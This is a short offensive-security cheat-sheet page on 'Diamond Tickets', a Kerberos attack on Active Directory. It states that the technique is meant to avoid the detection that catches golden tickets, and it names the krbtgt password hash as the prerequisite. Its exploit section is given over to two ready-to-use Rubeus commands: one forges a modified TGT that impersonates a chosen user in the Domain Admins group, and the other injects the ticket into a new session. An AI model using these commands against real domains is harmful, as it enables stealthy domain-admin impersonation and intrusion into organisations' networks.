Diamond Tickets
Table of contents
Vulnerability
One weakness of golden tickets is that they can be detected. Indeed, since these TGT are forged offline, looking for TGS-REQ requests that have no corresponding AS-REQ would permit to spot golden tickets usage. Diamond tickets consists in modifying an existing legit TGT that was issued by a Domain Controller so it could not be detected.
Prerequisites
- Having the password hash of
krbtgt
domain user.
Exploit
# Modify an existing TGT in the session to impersonate $username and put him in group 512 (corresponds to Domain Admins).
.\Rubeus.exe diamond /tgtdeleg /ticketuser:$username /ticketuserid:$rid /groups:512 /krbkey:$key /nowrap
# Inject the ticket in a dummy session.
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:$domain /username:$username /password:$whatever /ticket:$Base64EncodedTicket